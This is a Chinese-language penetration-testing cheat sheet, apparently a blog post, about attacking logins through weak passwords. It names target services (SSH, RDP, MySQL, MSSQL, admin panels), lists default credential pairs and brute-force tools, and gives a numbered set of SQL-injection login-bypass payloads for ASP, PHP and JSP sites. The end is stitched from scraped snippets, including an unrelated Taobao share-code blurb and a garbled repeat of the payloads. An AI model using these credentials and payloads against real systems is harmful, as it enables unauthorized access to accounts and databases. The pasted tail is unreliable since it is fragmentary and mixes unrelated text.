一、弱口令:
1、弱口令介紹
一般弱口令為系統預設密碼或設定的簡單密碼,這些密碼非常容易被攻擊者猜到。在實際的滲透測試中,弱口令是乙個攻擊難度低,攻擊成功率偏高的漏洞。
2、弱口令一般出現在什麼地方呢?
對於web層面就是後台管理員登入、普通使用者登入等;
對於中介軟體層面就是mysql弱口令、mssql弱口令、oracle弱口令、db2弱口令、weblogic弱口令、tomcat弱口令及phpmyadmin弱口令等;
對於系統層面就是ftp弱口令、3389弱口令、ssh弱口令、telnet弱口令及閘道器與路由登入弱口令等。
3、弱口令一般攻擊什麼地方呢?
弱口令一般直接對後台管理員登入介面及遠端3389 /21/22/23/1433/3306/1521等服務埠進行攻擊。
因此,我們還得先研究下怎麼找到這些後台及服務埠的入口。
4、後台和伺服器的入口
對於後台,推薦使用googlehack、githubhack、robots.txt及svn或者git**洩露等;對於遠端服務埠就得分類了,ftp有ftp暴破工具,ssh有ssh暴破工具,
3389有3389暴破工具,我們可以根據具體的情況使用不同的工具載入適當的弱口令對遠端埠進行暴力破解。
5、任何一種型別的漏洞,都沒有弱口令來得簡單、奏效。它的危害也是十分大的
6、某站遭到弱口令攻擊,弱口令攻擊有三類方法:手動使用經驗攻擊;使用弱密碼破解;使用彩虹表破解。
6.1、對於第一類,手動輸入
遇到主機輸入administrator/123456、administrator /abcd-1234、guest/guest、root/root等;
遇到web後台輸入admin/admin、admin/admin888、phpcms/phpcms等;遇到中介軟體輸入admin/admin、manager/admin、root/admin、weblogic/weblogic、tomcat/tomcat等;
遇到資料庫輸入root/root、root/root123、root/123456、sa/sa、sa/as、system/manager、scott/tiger等。
其實,就是利用人性的一些弱點來攻擊web站點(人們安全意識不強,沒有修改預設密碼)。
6.2、對於第二類,可以使用burpsuite-intruder或者hydra等工具直接載入wordlist弱口令破解(前提是無驗證碼,或者繞過驗證碼,或者沒有登入次數限制)。可以
6.3、對於第三類,是在實在沒有辦法而且系統很重要的情況下才可以採用的。
7、弱口令的危害
有了弱口令危害就意味著不論您在其他方面做了多少努力,攻擊者依然可以很輕鬆的突破您的邊界,使得那些強大的安全裝置通通淪為擺設。
抱歉,弱口令是真的可以為所欲為
8、弱口令的幾種型別,以及各種組合
簡單數字組合:123123 123456 12345678 654321 666666 888888
順序字元組合:abcdef abcabc abc123 a1b2c3 aaa111
臨近字元組合:123qwe qwerty qweasd
特殊含義組合:admin password p@ssword passwd iloveyou 5201314
二、萬能密碼:
這裡我只總結一些常用的萬能密碼
asp aspx萬能密碼
1:"or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6:"or 1=1--
7:'or'a'='a
8:"or"="a'='a
9:'or''='
10:'or'='or'
11:1 or '1'='1'=1
12:1 or '1'='1' or 1=1
13: 'or 1=1%00
14: "or 1=1%00
15:'xor
16: 使用者名稱 ' union select 1,1,1 from admin where ''=' (替換表名admin)
密碼 1
17..admin' or 'a'='a 密碼隨便
php萬能密碼
'or 1=1/*
user: something
pass: ' or '1'='1
jsp 萬能密碼
1'or'1'='1
admin' or 1=1/*
萬能淘口令
萬能淘口令 評測 推薦 客們對於淘口令可能在熟悉不過了,它是在 生成的一段字串,用來分享商品。萬能淘口令就是可以突破限制,不光可以生成商品頁面鏈結,還可以生成活動頁面鏈結等。那麼我們在 才能生成萬能淘口令呢?萬能淘口令是乙個bug的存在。不開放這個功能,就有人來打破限制,想辦法獲得這個介面。或從內部...
萬能密碼 php,PHP萬能密碼
說實話如果乙個 的前台都是注入漏洞,那麼憑經驗,萬能密碼進後台的機率基本上是百分之百。可是有的人說對php的站如果是gpc魔術轉換開啟,就會對特殊符號轉義,就徹底杜絕了php注入。其實說這話的人沒有好好想過,更沒有嘗試過用萬能密碼進php的後台。其實gpc魔術轉換是否開啟對用萬能密碼進後台一點影響也...
asp aspx php jsp萬能密碼
asp aspx萬能密碼 1 or a a 2 or a a 3 or 1 1 4 or 1 1 5 a or 1 1 6 or 1 1 7 or a a 8 or a a 9 or 10 or or 11 1 or 1 1 1 12 1 or 1 1 or 1 1 13 or 1 1 00 14 ...